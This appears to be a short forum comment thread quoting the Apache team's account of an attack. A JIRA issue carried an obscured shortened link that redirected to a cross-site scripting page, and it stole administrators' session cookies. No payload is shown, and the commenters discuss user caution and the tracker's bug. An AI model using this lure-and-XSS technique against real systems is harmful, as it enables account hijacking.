On April 5th, the attackers via a compromised Slicehost server opened a new issue, INFRA-2591. This issue contained the following text: ive got this error while browsing some projects in jira http://tinyurl.com/XXXXXXXXX [tinyurl.com] [obscured]...This specific URL redirected back to the Apache instance of JIRA, at a special URL containing a cross site scripting (XSS) attack. The attack was crafted to steal the session cookie from the user logged-in to JIRA. When this issue was opened against the Infrastructure team, several of our administators clicked on the link. This compromised their sessions, including their JIRA administrator rights.
Interesting attack, but depends on user fail (Score:2)
FTA:
On April 5th, the attackers via a compromised Slicehost server opened a new issue, INFRA-2591. This issue contained the following text:
ive got this error while browsing some projects in jira http://tinyurl.com/XXXXXXXXX [tinyurl.com] [obscured]...This specific URL redirected back to the Apache instance of JIRA, at a special URL containing a cross site scripting (XSS) attack. The attack was crafted to steal the session cookie from the user logged-in to JIRA. When this issue was opened against the Infrastructure team, several of our administators clicked on the link. This compromised their sessions, including their JIRA administrator rights.
Oops...check those URLs, admins...
Re:Interesting attack, but depends on user fail (Score:2)
But clicking on a link should newer be dangerous, so for this to work there must be a bug in their bugtracking software.